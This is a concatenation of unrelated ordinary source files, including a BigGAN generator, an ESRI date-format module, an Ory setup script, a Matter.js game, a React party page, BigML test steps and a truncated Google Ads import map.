= self.bn_2(x, truncation, cond_vector) x = self.relu(x) x = self.conv_2(x) x = self.bn_3(x, truncation, cond_vector) x = self.relu(x) x = self.conv_3(x) if self.drop_channels: new_channels = x0.shape[1] // 2 x0 = x0[:, :new_channels, ...] if self.up_sample: x0 = F.interpolate(x0, scale_factor=2, mode='nearest') out = x + x0 return out class Generator(nn.Module): def __init__(self, config): super(Generator, self).__init__() self.config = config ch = config.channel_width condition_vector_dim = config.z_dim * 2 self.gen_z = snlinear(in_features=condition_vector_dim, out_features=4 * 4 * 16 * ch, eps=config.eps) layers = [] for i, layer in enumerate(config.layers): if i == config.attention_layer_position: layers.append(SelfAttn(ch*layer[1], eps=config.eps)) layers.append(GenBlock(ch*layer[1], ch*layer[2], condition_vector_dim, up_sample=layer[0], n_stats=config.n_stats, eps=config.eps)) self.layers = nn.ModuleList(layers) self.bn = BigGANBatchNorm(ch, n_stats=config.n_stats, eps=config.eps, conditional=False) self.relu = nn.ReLU() self.conv_to_rgb = snconv2d(in_channels=ch, out_channels=ch, kernel_size=3, padding=1, eps=config.eps) self.tanh = nn.Tanh() def forward(self, cond_vector, truncation): z = self.gen_z(cond_vector) # We use this conversion step to be able to use TF weights: # TF convention on shape is [batch, height, width, channels] # PT convention on shape is [batch, channels, height, width] z = z.view(-1, 4, 4, 16 * self.config.channel_width) z = z.permute(0, 3, 1, 2).contiguous() for i, layer in enumerate(self.layers): if isinstance(layer, GenBlock): z = layer(z, cond_vector, truncation) else: z = layer(z) z = self.bn(z, truncation) z = self.relu(z) z = self.conv_to_rgb(z) z = z[:, :3, ...] z = self.tanh(z) return z class BigGAN(nn.Module): """BigGAN Generator.""" @classmethod def from_pretrained(cls, pretrained_model_name_or_path, cache_dir=None, *inputs, **kwargs): if pretrained_model_name_or_path in PRETRAINED_MODEL_ARCHIVE_MAP: model_file = PRETRAINED_MODEL_ARCHIVE_MAP[pretrained_model_name_or_path] config_file = PRETRAINED_CONFIG_ARCHIVE_MAP[pretrained_model_name_or_path] else: model_file = os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME) config_file = os.path.join(pretrained_model_name_or_path, CONFIG_NAME) try: resolved_model_file = cached_path(model_file, cache_dir=cache_dir) resolved_config_file = cached_path(config_file, cache_dir=cache_dir) except EnvironmentError: logger.error("Wrong model name, should be a valid path to a folder containing " "a {} file and a {} file or a model name in {}".format( WEIGHTS_NAME, CONFIG_NAME, PRETRAINED_MODEL_ARCHIVE_MAP.keys())) raise logger.info("loading model {} from cache at {}".format(pretrained_model_name_or_path, resolved_model_file)) # Load config config = BigGANConfig.from_json_file(resolved_config_file) logger.info("Model config {}".format(config)) # Instantiate model. model = cls(config, *inputs, **kwargs) state_dict = torch.load(resolved_model_file, map_location='cpu' if not torch.cuda.is_available() else None) model.load_state_dict(state_dict, strict=False) return model def __init__(self, config): super(BigGAN, self).__init__() self.config = config self.embeddings = nn.Linear(config.num_classes, config.z_dim, bias=False) self.generator = Generator(config) def forward(self, z, class_label, truncation): assert 0 < truncation <= 1 embed = self.embeddings(class_label) cond_vector = torch.cat((z, embed), dim=1) z = self.generator(cond_vector, truncation) return z if __name__ == "__main__": import PIL from .utils import truncated_noise_sample, save_as_images, one_hot_from_names from .convert_tf_to_pytorch import load_tf_weights_in_biggan load_cache = False cache_path = './saved_model.pt' config = BigGANConfig() model = BigGAN(config) if not load_cache: model = load_tf_weights_in_biggan(model, config, './models/model_128/', './models/model_128/batchnorms_stats.bin') torch.save(model.state_dict(), cache_path) else: model.load_state_dict(torch.load(cache_path)) model.eval() truncation = 0.4 noise = truncated_noise_sample(batch_size=2, truncation=truncation) label = one_hot_from_names('diver', batch_size=2) # Tests # noise = np.zeros((1, 128)) # label = [983] noise = torch.tensor(noise, dtype=torch.float) label = torch.tensor(label, dtype=torch.float) with torch.no_grad(): outputs = model(noise, label, truncation) print(outputs.shape) save_as_images(outputs)
// All material copyright ESRI, All Rights Reserved, unless otherwise specified. // See https://js.arcgis.com/4.8/esri/copyright.txt for details. //>>built define(["require","exports","./kebabDictionary"],function(b,a,c){Object.defineProperty(a,"__esModule",{value:!0});var d={"short-date":"(datePattern: 'M/d/y', selector: 'date')","short-date-le":"(datePattern: 'd/M/y', selector: 'date')","long-month-day-year":"(datePattern: 'MMMM d, y', selector: 'date')","day-short-month-year":"(datePattern: 'd MMM y', selector: 'date')","long-date":"(datePattern: 'EEEE, MMMM d, y', selector: 'date')","short-date-short-time":"(datePattern: 'M/d/y', timePattern: 'h:mm a', selector: 'date and time')", "short-date-le-short-time":"(datePattern: 'd/M/y', timePattern: 'h:mm a', selector: 'date and time')","short-date-short-time-24":"(datePattern: 'M/d/y', timePattern: 'H:mm', selector: 'date and time')","short-date-le-short-time-24":"(datePattern: 'd/M/y', timePattern: 'H:mm', selector: 'date and time')","short-date-long-time":"(datePattern: 'M/d/y', timePattern: 'h:mm:ss a', selector: 'date and time')","short-date-le-long-time":"(datePattern: 'd/M/y', timePattern: 'h:mm:ss a', selector: 'date and time')", "short-date-long-time-24":"(datePattern: 'M/d/y', timePattern: 'H:mm:ss', selector: 'date and time')","short-date-le-long-time-24":"(datePattern: 'd/M/y', timePattern: 'H:mm:ss', selector: 'date and time')","long-month-year":"(datePattern: 'MMMM y', selector: 'date')","short-month-year":"(datePattern: 'MMM y', selector: 'date')",year:"(datePattern: 'y', selector: 'date')"};b=c({shortDate:"short-date",shortDateLE:"short-date-le",longDate:"long-date",dayShortMonthYear:"day-short-month-year",longMonthDayYear:"long-month-day-year", shortDateLongTime:"short-date-long-time",shortDateLELongTime:"short-date-le-long-time",shortDateShortTime:"short-date-short-time",shortDateLEShortTime:"short-date-le-short-time",shortDateShortTime24:"short-date-short-time-24",shortDateLEShortTime24:"short-date-le-short-time-24",shortDateLongTime24:"short-date-long-time-24",shortDateLELongTime24:"short-date-le-long-time-24",longMonthYear:"long-month-year",shortMonthYear:"short-month-year"});a.toJSON=b.toJSON;a.fromJSON=b.fromJSON;a.getFormat=function(a){return d[a]}});
""" Ory APIs Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501 The version of the OpenAPI document: v0.0.1-alpha.9 Contact: [email protected] Generated by: https://openapi-generator.tech """ from setuptools import setup, find_packages # noqa: H301 NAME = "ory-client" VERSION = "v0.0.1-alpha.9" # To install the library, run the following # # python setup.py install # # prerequisite: setuptools # http://pypi.python.org/pypi/setuptools REQUIRES = [ "urllib3 >= 1.25.3", "python-dateutil", ] setup( name=NAME, version=VERSION, description="Ory APIs", author="API Support", author_email="[email protected]", url="https://github.com/ory/sdk", keywords=["OpenAPI", "OpenAPI-Generator", "Ory APIs"], python_requires=">=3.6", install_requires=REQUIRES, packages=find_packages(exclude=["test", "tests"]), include_package_data=True, license="Apache 2.0", long_description="""\ Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501 """ )
/* http://madivachallenge.appspot.com */ (function firstChallenge() { var isBlack = function(node) { // Solution for webkit only return document.defaultView.getComputedStyle(node, null).getPropertyValue("color") == "rgb(0, 0, 0)"; }; var total = 0; var number_nodes = []; var i, len, number, nodes; nodes = document.querySelectorAll("span"); for (i = 0, len = nodes.length; i < len; i++) { if (nodes[i].childNodes.length > 1) { number = null; if (nodes[i].childNodes[0].childNodes.length > 0 && isBlack(nodes[i].childNodes[0])) { number = parseInt(nodes[i].childNodes[0].innerHTML.trim(), 10); } else { if (nodes[i].childNodes[1].childNodes.length > 0 && isBlack(nodes[i].childNodes[1])) { number = parseInt(nodes[i].childNodes[1].innerHTML.trim(), 10); } } if (number !== null && number % 2 === 1) { number_nodes.push(number); } } } return number_nodes.reduce(function(prev, current, index, items) { return (prev + current); }, 0); })();
const Engine = Matter.Engine; const World = Matter.World; const Bodies = Matter.Bodies; const Constraint = Matter.Constraint; var engine, world, backgroundImg, waterSound, backgroundMusic, cannonExplosion; var canvas, angle, tower, ground, cannon, boat; var balls = []; var boats = []; var brokenBoatanimation= []; var brokenBoatSpritedata; var brokenBoatSpritesheet; var boatAnimation = []; var boatSpritedata, boatSpritesheet; function preload() { backgroundImg = loadImage("./assets/background.gif"); towerImage = loadImage("./assets/tower.png"); boatSpritedata = loadJSON("assets/boat/boat.json"); boatSpritesheet = loadImage("assets/boat/boat.png"); brokenBoatSpritedata = loadJSON("assets/boat/broken_boat.json"); brokenBoatSpritesheet = loadImage("assets/boat/broken_boat.png"); } function setup() { canvas = createCanvas(1200, 600); engine = Engine.create(); world = engine.world; angle = -PI / 4; ground = new Ground(0, height - 1, width * 2, 1); tower = new Tower(150, 350, 160, 310); cannon = new Cannon(180, 110, 110, 50, angle); var boatFrames = boatSpritedata.frames; for (var i = 0; i < boatFrames.length; i++) { var pos = boatFrames[i].position; var img = boatSpritesheet.get(pos.x, pos.y, pos.w, pos.h); boatAnimation.push(img); } var brokenBoatFrames = brokenBoatSpritedata.frames; for(var j = 0; j < brokenBoatFrames.length; j++){ var pos = brokenBoatFrames[j].position; var img = brokenBoatSpritesheet.get(pos.x,pos.y,pos.w,pos.h) brokenBoatanimation.push(img); } } function draw() { background(189); image(backgroundImg, 0, 0, width, height); Engine.update(engine); ground.display(); showBoats(); for (var i = 0; i < balls.length; i++) { showCannonBalls(balls[i], i); for (var j = 0; j < boats.length; j++) { if (balls[i] !== undefined && boats[j] !== undefined) { var collision = Matter.SAT.collides(balls[i].body, boats[j].body); if (collision.collided) { boats[j].remove(j); Matter.World.remove(world, balls[i].body); balls.splice(i, 1); i--; } } } } cannon.display(); tower.display(); } //creating the cannon ball on key press function keyPressed() { if (keyCode === DOWN_ARROW) { var cannonBall = new CannonBall(cannon.x, cannon.y); cannonBall.trajectory = []; Matter.Body.setAngle(cannonBall.body, cannon.angle); balls.push(cannonBall); } } // function to show the ball. function showCannonBalls(ball, index) { ball.display(); if (ball.body.position.x >= width || ball.body.position.y >= height - 50) { Matter.World.remove(world, ball.body); balls.splice(index, 1); } } //function to show the boat function showBoats() { if (boats.length > 0) { if ( boats.length < 4 && boats[boats.length - 1].body.position.x < width - 300 ) { var positions = [-40, -60, -70, -20]; var position = random(positions); var boat = new Boat( width, height - 100, 170, 170, position, boatAnimation ); boats.push(boat); } for (var i = 0; i < boats.length; i++) { Matter.Body.setVelocity(boats[i].body, { x: -0.9, y: 0 }); boats[i].display(); boats[i].animate(); var collision = Matter.SAT.collides(tower.body, boats[i].body); } } else { var boat = new Boat(width, height - 60, 170, 170, -60, boatAnimation); boats.push(boat); } } //releasing the cannonball on key release function keyReleased() { if (keyCode === DOWN_ARROW) { balls[balls.length - 1].shoot(); } }
import React, { useContext, useEffect, useState } from "react"; import { useParams, withRouter } from "react-router"; import ClipLoader from "react-spinners/ClipLoader"; import { getLeaderInfo, getUserRole, userHasPerm } from "../../../../server/classes/Party/Methods"; import { AlertContext } from "../../../context/AlertContext"; import { UserContext } from "../../../context/UserContext"; import PartyInfoService from "../../../service/PartyService"; import Body from "../../Structure/Body"; import PartyManagement from "./PartyManagement"; import PartyMembers from "./PartyMembers"; import PartyOverview from "./PartyOverview/PartyOverview"; import PartyTreasury from "./PartyTreasury"; function Party(props) { var [partyID, setPartyID] = useState(null); var [partyInfo, setPartyInfo] = useState({}); var [partyLoading, setLoading] = useState(true); var [partyMode, setPartyMode] = useState("overview"); var { partyId: requestedPartyId, mode } = useParams(); var { setPlayerData, setRefresh, refresh } = useContext(UserContext); const { setAlert } = useContext(AlertContext); const { sessionData, playerData } = useContext(UserContext); async function fetchData() { if (mode != "overview" && mode != "treasury" && mode != "management" && mode != "committee" && mode != "members") { setPartyMode("overview"); } else { setPartyMode(mode); } // For some reason, they don't provide a party ID. if (requestedPartyId === undefined) { setAlert("Party ID not provided."); props.history.push("/"); } else { setPartyID(requestedPartyId); var info = await PartyInfoService.fetchPartyById(requestedPartyId); // Fetching party returns error if (info.hasOwnProperty("error")) { setAlert("Party not found."); // Redirect to index. Because I'm lazy. props.history.push("/"); } else { setPartyInfo(info); } } // Set loading to false to remove loading screen. setLoading(false); document.title = `${info.name} | AUTHORITY`; } useEffect(() => { console.debug(requestedPartyId, mode); fetchData(); return function cleanup() { setLoading(true); }; }, [requestedPartyId, mode, setPartyInfo]); const leaveParty = async () => { var leaderCosmetics = partyInfo.leaderCosmetics; if (sessionData.loggedIn) { if (playerData.party == partyInfo.id) { var data = await PartyInfoService.leaveParty(); if (data.hasOwnProperty("error")) { setAlert(data.error); } else { const { userInfo, partyInfo } = data; setPlayerData(userInfo); setPartyInfo({ ...partyInfo, leaderCosmetics }); setRefresh(!refresh); } } } }; const joinParty = async () => { var leaderCosmetics = partyInfo.leaderCosmetics; var id = partyInfo.id; if (sessionData.loggedIn) { var data = await PartyInfoService.joinParty(id); if (data.hasOwnProperty("error")) { setAlert(data.error); } else { const { userInfo, partyInfo } = data; setPlayerData(userInfo); setPartyInfo({ ...partyInfo, leaderCosmetics }); setRefresh(!refresh); } } }; const claimLeadership = async () => { if (sessionData.loggedIn && getLeaderInfo(partyInfo, "id") == 0) { var data = await PartyInfoService.claimLeadership(); const { userInfo, partyInfo } = data; setPlayerData(userInfo); setPartyInfo(partyInfo); setRefresh(!refresh); } }; const resignLeadership = async () => { if (sessionData.loggedIn && getUserRole(partyInfo, playerData.id, "uniqueID") != -1) { var data = await PartyInfoService.resignLeadership(); const { userInfo, partyInfo } = data; setPlayerData(userInfo); setPartyInfo(partyInfo); setRefresh(refresh + 1); } }; if (partyLoading) { return ( <Body middleColWidth="11"> <ClipLoader /> </Body> ); } else { return ( <Body middleColWidth="11"> <br /> <h2>{partyInfo.name}</h2> <img style={{ maxWidth: "150px", maxHeight: "150px", border: "2.5px solid", borderColor: "black" }} src={partyInfo.partyPic} /> <br /> {/* If they are logged in and are in the same party. */} {sessionData.loggedIn && playerData.party == partyInfo.id && ( <> <div style={{ marginTop: "8px" }} className="row justify-content-center"> <div className="col-md-4"> <button className="btn btn-danger" onClick={leaveParty}> Leave Party (Lose 50% HSI) </button> </div> </div> {getLeaderInfo(partyInfo, "id") == 0 && ( <div style={{ marginTop: "8px" }} className="row justify-content-center"> <div className="col-md-4"> <button className="btn btn-primary" onClick={claimLeadership}> Claim Leadership </button> </div> </div> )} {getUserRole(partyInfo, playerData.id, "uniqueID") != -1 && ( <div style={{ marginTop: "8px" }} className="row justify-content-center"> <div className="col-md-4"> <button className="btn btn-primary" onClick={resignLeadership}> Resign from Role </button> </div> </div> )} </> )} {/* If they are logged in aren't in that party. */} {sessionData.loggedIn && playerData.party != partyInfo.id && ( <> <div style={{ marginTop: "8px" }} className="row justify-content-center"> <div className="col-md-4"> <button className={playerData.party != partyInfo.id && playerData.party != 0 ? "btn btn-danger" : "btn btn-primary"} onClick={joinParty}> {playerData.party != partyInfo.id && playerData.party != 0 ? "Defect to Party" : "Join Party"} </button> </div> </div> </> )} <hr /> {/* Party Modes */} <div className="row justify-content-center"> <div className="col"> <button className={"btn btn-primary partyButton" + (partyMode == "members" ? " active" : "")} onClick={() => { setPartyMode("members"); }} > Members </button> <button className={"btn btn-primary partyButton" + (partyMode == "overview" ? " active" : "")} onClick={() => { setPartyMode("overview"); }} > Overview </button> <button className={"btn btn-primary partyButton" + (partyMode == "partyCommittee" ? " active" : "")} onClick={() => { setPartyMode("committee"); }} > Party Committee </button> {sessionData.loggedIn && playerData.party == partyInfo.id && ( <button className={"btn btn-primary partyButton" + (partyMode == "treasury" ? " active" : "")} onClick={() => { setPartyMode("treasury"); }} > Party Treasury </button> )} {userHasPerm(playerData.id, partyInfo, "leader") && ( <button className={"btn btn-primary partyButton" + (partyMode == "management" ? " active" : "")} onClick={() => { setPartyMode("management"); }} > Party Management </button> )} </div> </div> <hr /> {/*Roles*/} {partyMode == "overview" && <PartyOverview partyInfo={partyInfo} />} {partyMode == "members" && <PartyMembers partyInfo={partyInfo} />} {partyMode == "management" && <PartyManagement partyInfo={partyInfo} />} {partyMode == "treasury" && <PartyTreasury fetchPartyData={fetchData} partyInfo={partyInfo} />} {partyMode == "committee" && props.history.push(`/partyCommittee/${partyInfo.id}`)} </Body> ); } } export default withRouter(Party);
//Global Variables var getCareer = new Array(); getCareer["chkRealistic1"] = 1; getCareer["chkRealistic2"] = 1; getCareer["chkRealistic3"] = 1; getCareer["chkRealistic4"] = 1; getCareer["chkRealistic5"] = 1; getCareer["chkRealistic6"] = 1; getCareer["chkRealistic7"] = 1; getCareer["chkRealistic8"] = 1; getCareer["chkRealistic9"] = 1; function getRealistic() { var rTotal = 0; var selectedRealistic = document.forms["frmCareer"]["chkRealistic"]; for (var sel = 0; sel < selectedRealistic.length; sel++) { if (selectedRealistic[sel].checked) rTotal += getCareer[selectedRealistic[sel].value] } document.getElementById("lblRealistic").innerHTML = rTotal+ "/9 of the causes of Hypertension selected." }//End of function getRealisticCareer()
var express = require('express'); var _ = require('lodash'); var util = require('util'); var request = require('request'); exports = module.exports = FetchAirlineDetails function FetchAirlineDetails() { } FetchAirlineDetails.prototype.getAirlineDetails = function() { var self = this; return function(req, res, next) { self.callAirlinesApi(function(err, data) { if (err) { res.status(err.status || 400).send(err.message || 'Internal Server Error'); } res.set({ 'Content-Type': 'application/json' }); res.status(200).send(data); }) } } FetchAirlineDetails.prototype.callAirlinesApi = function(cb) { request('http://node.locomote.com/code-task/airlines', function(error, response, body) { if (error) { return cb(error); } if (response.statusCode !== 200) { return cb(new Error(body)); } try { var airlinesData = JSON.parse(body); } catch (err) { return cb(err); } cb(null, airlinesData); }); } /** Function registers /airlines route with express and returns a router */ FetchAirlineDetails.prototype.setupRoutes = function() { var router = express.Router(); router.get('/airlines', this.getAirlineDetails()); return router; }
# -*- coding: utf-8 -*- #!/usr/bin/env python # # Copyright 2012-2015 BigML # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import time import json import csv import sys from datetime import datetime, timedelta from world import world, res_filename from bigml.api import HTTP_CREATED, HTTP_ACCEPTED from bigml.api import FINISHED from bigml.api import FAULTY from bigml.api import UPLOADING from bigml.api import get_status import read_source_steps as read #@step(r'I create a data source uploading a "(.*)" file$') def i_upload_a_file(step, file): resource = world.api.create_source(res_filename(file), \ {'project': world.project_id}) # update status world.status = resource['code'] world.location = resource['location'] world.source = resource['object'] # save reference world.sources.append(resource['resource']) #@step(r'I create a data source uploading a "(.*)" file with args "(.*)"$') def i_upload_a_file_with_args(step, file, args): args = json.loads(args) args.update({'project': world.project_id}) resource = world.api.create_source(res_filename(file), args) # update status world.status = resource['code'] world.location = resource['location'] world.source = resource['object'] # save reference world.sources.append(resource['resource']) #@step(r'I create a data source using the url "(.*)"') def i_create_using_url(step, url): resource = world.api.create_source(url, {'project': world.project_id}) # update status world.status = resource['code'] world.location = resource['location'] world.source = resource['object'] # save reference world.sources.append(resource['resource']) #@step(r'I create a data source from inline data slurped from "(.*)"') def i_create_using_dict_data(step, data): # slurp CSV file to local variable mode = 'rb' if sys.version > '3': mode = 'rt' with open(res_filename(data), mode) as fid: reader = csv.DictReader(fid) dict_data = [row for row in reader] # create source resource = world.api.create_source(dict_data, {'project': world.project_id}) # update status world.status = resource['code'] world.location = resource['location'] world.source = resource['object'] # save reference world.sources.append(resource['resource']) #@step(r'I create a data source uploading a "(.*)" file in asynchronous mode$') def i_upload_a_file_async(step, file): resource = world.api.create_source(res_filename(file), {'project': world.project_id}, async=True) world.resource = resource #@step(r'I wait until the source has been created less than (\d+) secs') def the_source_has_been_created_async(step, secs): start = datetime.utcnow() status = get_status(world.resource) while status['code'] == UPLOADING: time.sleep(3) assert datetime.utcnow() - start < timedelta(seconds=int(secs)) status = get_status(world.resource) assert world.resource['code'] == HTTP_CREATED # update status world.status = world.resource['code'] world.location = world.resource['location'] world.source = world.resource['object'] # save reference world.sources.append(world.resource['resource']) #@step(r'I wait until the source status code is either (\d) or (\d) less than (\d+)') def wait_until_source_status_code_is(step, code1, code2, secs): start = datetime.utcnow() read.i_get_the_source(step, world.source['resource']) status = get_status(world.source) while (status['code'] != int(code1) and status['code'] != int(code2)): time.sleep(3) assert datetime.utcnow() - start < timedelta(seconds=int(secs)) read.i_get_the_source(step, world.source['resource']) status = get_status(world.source) assert status['code'] == int(code1) #@step(r'I wait until the source is ready less than (\d+)') def the_source_is_finished(step, secs): wait_until_source_status_code_is(step, FINISHED, FAULTY, secs) #@step(r'I update the source with params "(.*)"') def i_update_source_with(step, data="{}"): resource = world.api.update_source(world.source.get('resource'), json.loads(data)) world.status = resource['code'] assert world.status == HTTP_ACCEPTED #@step(r'the source exists and has args "(.*)"') def source_has_args(step, args="{}"): args = json.loads(args) for key, value in args.items(): if key in world.source: if world.source[key] == value: assert True else: assert False, "Expected key %s: %s. Found %s" % ( key, value, world.source[key]) else: assert False, "No key %s in source." % key
# -*- coding: utf-8 -*- # # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import importlib import sys from itertools import chain from google.api_core.protobuf_helpers import get_messages from google.ads.google_ads import util if sys.version_info < (3, 6): raise ImportError("This module requires Python 3.6 or later.") _lazy_name_to_package_map = { "ad_asset_pb2": "google.ads.google_ads.v6.proto.common", "ad_type_infos_pb2": "google.ads.google_ads.v6.proto.common", "asset_policy_pb2": "google.ads.google_ads.v6.proto.common", "asset_types_pb2": "google.ads.google_ads.v6.proto.common", "bidding_pb2": "google.ads.google_ads.v6.proto.common", "click_location_pb2": "google.ads.google_ads.v6.proto.common", "criteria_pb2": "google.ads.google_ads.v6.proto.common", "criterion_category_availability_pb2": "google.ads.google_ads.v6.proto.common", "custom_parameter_pb2": "google.ads.google_ads.v6.proto.common", "dates_pb2": "google.ads.google_ads.v6.proto.common", "explorer_auto_optimizer_setting_pb2": "google.ads.google_ads.v6.proto.common", "extensions_pb2": "google.ads.google_ads.v6.proto.common", "feed_common_pb2": "google.ads.google_ads.v6.proto.common", "feed_item_set_filter_type_infos_pb2": "google.ads.google_ads.v6.proto.common", "final_app_url_pb2": "google.ads.google_ads.v6.proto.common", "frequency_cap_pb2": "google.ads.google_ads.v6.proto.common", "keyword_plan_common_pb2": "google.ads.google_ads.v6.proto.common", "matching_function_pb2": "google.ads.google_ads.v6.proto.common", "metrics_pb2": "google.ads.google_ads.v6.proto.common", "offline_user_data_pb2": "google.ads.google_ads.v6.proto.common", "policy_pb2": "google.ads.google_ads.v6.proto.common", "real_time_bidding_setting_pb2": "google.ads.google_ads.v6.proto.common", "segments_pb2": "google.ads.google_ads.v6.proto.common", "simulation_pb2": "google.ads.google_ads.v6.proto.common", "tag_snippet_pb2": "google.ads.google_ads.v6.proto.common", "targeting_setting_pb2": "google.ads.google_ads.v6.proto.common", "text_label_pb2": "google.ads.google_ads.v6.proto.common", "url_collection_pb2": "google.ads.google_ads.v6.proto.common", "user_lists_pb2": "google.ads.google_ads.v6.proto.common", "value_pb2": "google.ads.google_ads.v6.proto.common", "access_invitation_status_pb2": "google.ads.google_ads.v6.proto.enums", "access_reason_pb2": "google.ads.google_ads.v6.proto.enums", "access_role_pb2": "google.ads.google_ads.v6.proto.enums", "account_budget_proposal_status_pb2": "google.ads.google_ads.v6.proto.enums", "account_budget_proposal_type_pb2": "google.ads.google_ads.v6.proto.enums", "account_budget_status_pb2": "google.ads.google_ads.v6.proto.enums", "account_link_status_pb2": "google.ads.google_ads.v6.proto.enums", "ad_customizer_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "ad_destination_type_pb2": "google.ads.google_ads.v6.proto.enums", "ad_group_ad_rotation_mode_pb2": "google.ads.google_ads.v6.proto.enums", "ad_group_ad_status_pb2": "google.ads.google_ads.v6.proto.enums", "ad_group_criterion_approval_status_pb2": "google.ads.google_ads.v6.proto.enums", "ad_group_criterion_status_pb2": "google.ads.google_ads.v6.proto.enums", "ad_group_status_pb2": "google.ads.google_ads.v6.proto.enums", "ad_group_type_pb2": "google.ads.google_ads.v6.proto.enums", "ad_network_type_pb2": "google.ads.google_ads.v6.proto.enums", "ad_serving_optimization_status_pb2": "google.ads.google_ads.v6.proto.enums", "ad_strength_pb2": "google.ads.google_ads.v6.proto.enums", "ad_type_pb2": "google.ads.google_ads.v6.proto.enums", "advertising_channel_sub_type_pb2": "google.ads.google_ads.v6.proto.enums", "advertising_channel_type_pb2": "google.ads.google_ads.v6.proto.enums", "affiliate_location_feed_relationship_type_pb2": "google.ads.google_ads.v6.proto.enums", "affiliate_location_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "age_range_type_pb2": "google.ads.google_ads.v6.proto.enums", "app_campaign_app_store_pb2": "google.ads.google_ads.v6.proto.enums", "app_campaign_bidding_strategy_goal_type_pb2": "google.ads.google_ads.v6.proto.enums", "app_payment_model_type_pb2": "google.ads.google_ads.v6.proto.enums", "app_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "app_store_pb2": "google.ads.google_ads.v6.proto.enums", "app_url_operating_system_type_pb2": "google.ads.google_ads.v6.proto.enums", "asset_field_type_pb2": "google.ads.google_ads.v6.proto.enums", "asset_link_status_pb2": "google.ads.google_ads.v6.proto.enums", "asset_performance_label_pb2": "google.ads.google_ads.v6.proto.enums", "asset_type_pb2": "google.ads.google_ads.v6.proto.enums", "attribution_model_pb2": "google.ads.google_ads.v6.proto.enums", "batch_job_status_pb2": "google.ads.google_ads.v6.proto.enums", "bid_modifier_source_pb2": "google.ads.google_ads.v6.proto.enums", "bidding_source_pb2": "google.ads.google_ads.v6.proto.enums", "bidding_strategy_status_pb2": "google.ads.google_ads.v6.proto.enums", "bidding_strategy_type_pb2": "google.ads.google_ads.v6.proto.enums", "billing_setup_status_pb2": "google.ads.google_ads.v6.proto.enums", "brand_safety_suitability_pb2": "google.ads.google_ads.v6.proto.enums", "budget_campaign_association_status_pb2": "google.ads.google_ads.v6.proto.enums", "budget_delivery_method_pb2": "google.ads.google_ads.v6.proto.enums", "budget_period_pb2": "google.ads.google_ads.v6.proto.enums", "budget_status_pb2": "google.ads.google_ads.v6.proto.enums", "budget_type_pb2": "google.ads.google_ads.v6.proto.enums", "call_conversion_reporting_state_pb2": "google.ads.google_ads.v6.proto.enums", "call_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "call_tracking_display_location_pb2": "google.ads.google_ads.v6.proto.enums", "call_type_pb2": "google.ads.google_ads.v6.proto.enums", "callout_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "campaign_criterion_status_pb2": "google.ads.google_ads.v6.proto.enums", "campaign_draft_status_pb2": "google.ads.google_ads.v6.proto.enums", "campaign_experiment_status_pb2": "google.ads.google_ads.v6.proto.enums", "campaign_experiment_traffic_split_type_pb2": "google.ads.google_ads.v6.proto.enums", "campaign_experiment_type_pb2": "google.ads.google_ads.v6.proto.enums", "campaign_serving_status_pb2": "google.ads.google_ads.v6.proto.enums", "campaign_shared_set_status_pb2": "google.ads.google_ads.v6.proto.enums", "campaign_status_pb2": "google.ads.google_ads.v6.proto.enums", "change_client_type_pb2": "google.ads.google_ads.v6.proto.enums", "change_event_resource_type_pb2": "google.ads.google_ads.v6.proto.enums", "change_status_operation_pb2": "google.ads.google_ads.v6.proto.enums", "change_status_resource_type_pb2": "google.ads.google_ads.v6.proto.enums", "click_type_pb2": "google.ads.google_ads.v6.proto.enums", "combined_audience_status_pb2": "google.ads.google_ads.v6.proto.enums", "content_label_type_pb2": "google.ads.google_ads.v6.proto.enums", "conversion_action_category_pb2": "google.ads.google_ads.v6.proto.enums", "conversion_action_counting_type_pb2": "google.ads.google_ads.v6.proto.enums", "conversion_action_status_pb2": "google.ads.google_ads.v6.proto.enums", "conversion_action_type_pb2": "google.ads.google_ads.v6.proto.enums", "conversion_adjustment_type_pb2": "google.ads.google_ads.v6.proto.enums", "conversion_attribution_event_type_pb2": "google.ads.google_ads.v6.proto.enums", "conversion_lag_bucket_pb2": "google.ads.google_ads.v6.proto.enums", "conversion_or_adjustment_lag_bucket_pb2": "google.ads.google_ads.v6.proto.enums", "criterion_category_channel_availability_mode_pb2": "google.ads.google_ads.v6.proto.enums", "criterion_category_locale_availability_mode_pb2": "google.ads.google_ads.v6.proto.enums", "criterion_system_serving_status_pb2": "google.ads.google_ads.v6.proto.enums", "criterion_type_pb2": "google.ads.google_ads.v6.proto.enums", "custom_audience_member_type_pb2": "google.ads.google_ads.v6.proto.enums", "custom_audience_status_pb2": "google.ads.google_ads.v6.proto.enums", "custom_audience_type_pb2": "google.ads.google_ads.v6.proto.enums", "custom_interest_member_type_pb2": "google.ads.google_ads.v6.proto.enums", "custom_interest_status_pb2": "google.ads.google_ads.v6.proto.enums", "custom_interest_type_pb2": "google.ads.google_ads.v6.proto.enums", "custom_placeholder_field_pb2": "google.ads.google_ads.v6.proto.enums", "customer_match_upload_key_type_pb2": "google.ads.google_ads.v6.proto.enums", "customer_pay_per_conversion_eligibility_failure_reason_pb2": "google.ads.google_ads.v6.proto.enums", "data_driven_model_status_pb2": "google.ads.google_ads.v6.proto.enums", "day_of_week_pb2": "google.ads.google_ads.v6.proto.enums", "device_pb2": "google.ads.google_ads.v6.proto.enums", "display_ad_format_setting_pb2": 